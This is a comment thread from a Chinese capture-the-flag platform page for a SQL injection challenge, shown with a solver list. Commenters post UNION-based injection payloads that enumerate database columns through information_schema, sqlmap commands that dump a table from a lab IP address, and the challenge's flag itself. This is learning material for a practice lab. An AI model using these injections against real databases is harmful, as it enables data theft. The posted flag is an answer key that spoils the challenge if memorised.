评分(21)
解题动态
Muchan 攻破了该题 14小时前
zhuimengpi 攻破了该题 15小时前
end813912 攻破了该题 18小时前
2471678527 攻破了该题 1天前
粒子之力 攻破了该题 1天前
2023201384 攻破了该题 1天前
2023201436 攻破了该题 1天前
04014796 攻破了该题 1天前
15293505341 攻破了该题 1天前
mvbugku 攻破了该题 2天前
翻斗花园突破手 攻破了该题 4天前
卡卡罗特M 攻破了该题 4天前
Rookieeeee 攻破了该题 5天前
youth1 攻破了该题 5天前
NGD566 攻破了该题 5天前
神级菜鸟 攻破了该题 6天前
yutou 攻破了该题 6天前
18803687092 攻破了该题 6天前
laitya1 攻破了该题 6天前
评论
use 1年前
举报
--batch -D skctf --dump
15826978220 1年前
举报
单引号闭合,联合注入
3166235571 1年前
举报
flag{467bbedc241402f5b4e28f37ace7ef82}
不聪明小孩 1年前
举报
-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值
19818532957 10月前
举报
佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #
DrKeen 1年前
举报
hackbar有问题id=1'做不到,用burp搞了
SmallH 1年前
举报
是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???
.⎛⎝•̀ω•́⎠⎞. 1年前
举报
我用sqlmap做出来了
gboyd 1年前
举报
我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!
NPC 1年前
举报
环境绝对有问题,照着答案注入都无回显!!!退金币!
EtHat 1年前
举报
sqlmap一把梭哈
blackjack009 1年前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump